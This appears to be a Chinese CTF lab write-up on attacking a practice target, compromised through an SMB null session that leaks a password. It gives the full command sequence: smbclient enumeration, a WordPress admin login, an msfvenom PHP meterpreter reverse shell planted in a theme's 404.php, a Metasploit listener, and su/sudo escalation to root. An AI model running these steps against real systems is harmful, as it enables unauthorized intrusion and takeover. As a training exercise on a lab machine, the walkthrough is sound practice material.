CTF—攻防練習之SMB私鑰泄露

攻擊機：192.168.32.152

靶機 ：192.168.32.155

 

打開靶機

nmap一下

咱們看到了開放了 ssh，smb，mysql這些端口，還有一個大端口

對smb服務咱們能夠
1.使用空口令，弱口令嘗試，查看敏感文件

-- smbclient -L IP
-- smbclient '\\IP\$share'
-- get敏感文件

2.遠程溢出漏洞分析
--searchsploit samba版本號

咱們用smbclient -L 192.168.32.155 列出smb索所分享的全部目錄，用空口令恰好能夠登陸

發現一個共享設備打印機，一個共享文件還有一個空鏈接web服務器
咱們查看下這些文件
smbclient '\\192.168.32.155\print$'
smbclient '\\192.168.32.155\share$'
smbclient '\\192.168.32.155\IPC$'

發現目前只有share的文件能夠利用

那麼就get 下載下來吧

get deets.txt
get robots.txt

發如今deets.txt文件中有串密碼12345

在wordpress目錄中發現config配置文件信息，下載下來，發現服務器admin和password

那麼咱們就嘗試用該帳戶和密碼登陸mysql數據庫

不容許遠程鏈接。。那麼咱們想辦法登陸到遠程服務器，ssh也是開放的端口，試試ssh

ssh Admin@192.168.32.155 試下出現的兩個密碼都不對

試試searchsploit 探索性smb版本有沒有可利用的溢出漏洞

nmap -A -v -T4 192.168.32.155 查看端口對應版本號

 searchsploit 。。。 沒有發現任何溢出漏洞

 

咱們暫時放棄smb和ssh，用http的端口試試，dirb一下

有關admin打開試試

 

在這裏咱們輸入剛纔的Admin和密碼咱們就登進去了！

那麼咱們就製做一個webshell木立刻傳上去

msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.32.152 lport=4444 生成一個反彈shell上傳php木馬

保存下來
再打開metasploit啓動監聽
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set lhost 192.168.32.152
exploit
再打開剛纔的網頁，找到了一個上傳webshell的位置

點擊update file

 success！

再打開路徑得到反彈shell

http://靶場ip/wordpress/wp-content/thems/twentyfifteen/404.php

啓動，會話秒斷。。。

最後發現payload設置錯了，搞成wiondows了。。。再來一次

python -c "import pty;pty.spawn('/bin/bash')"  優化終端

而後 su root，輸密碼嘗試了剛纔找出幾個不對，那麼再去試試別的用戶
cat /etc/passwd 發現home下一個用戶togie

 

su togie 密碼爲找到的12345 sudo su 提權，靶場權限拿下最後根目錄下有flag文件